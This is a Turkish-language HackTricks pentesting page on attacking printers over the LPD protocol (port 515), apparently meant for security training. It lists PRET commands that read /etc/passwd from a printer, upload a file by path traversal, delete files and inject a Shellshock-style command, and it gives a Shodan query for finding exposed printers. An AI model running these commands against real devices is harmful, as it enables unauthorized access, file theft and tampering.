4.1 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
LPD Protokolüne Giriş
1980'lerde, Line Printer Daemon (LPD) protokolü Berkeley Unix'te geliştirilmiş ve daha sonra RFC1179 ile resmileştirilmiştir. Bu protokol, lpr
komutu aracılığıyla etkileşimlere olanak tanıyan 515/tcp portu üzerinden çalışır. LPD aracılığıyla yazdırmanın özü, iş detaylarını ve kullanıcıyı belirtmek için bir kontrol dosyası ile yazdırma bilgilerini içeren bir veri dosyası göndermeyi içerir. Kontrol dosyası, veri dosyası için çeşitli dosya formatlarının seçilmesine olanak tanırken, bu dosyaların işlenmesi belirli LPD uygulaması tarafından belirlenir. Unix benzeri sistemler için yaygın olarak tanınan bir uygulama LPRng'dir. Dikkate değer bir şekilde, LPD protokolü kötü niyetli PostScript veya PJL yazdırma işleri yürütmek için istismar edilebilir.
LPD Yazıcıları ile Etkileşim İçin Araçlar
PRET, LPD uyumlu yazıcılarla etkileşim için lpdprint
ve lpdtest
adlı iki temel aracı tanıtır ve bu araçlar, yazıcıda veri yazdırmaktan dosyaları indirme, yükleme veya silme gibi bir dizi eylemi gerçekleştirmek için basit bir yöntem sunar:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Baskı hacking dünyasını daha fazla keşfetmekle ilgilenen bireyler için kapsamlı bir kaynak burada bulunabilir: Hacking Printers.
Shodan
port 515
{% hint style="success" %}
AWS Hacking öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live bizi takip edin.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.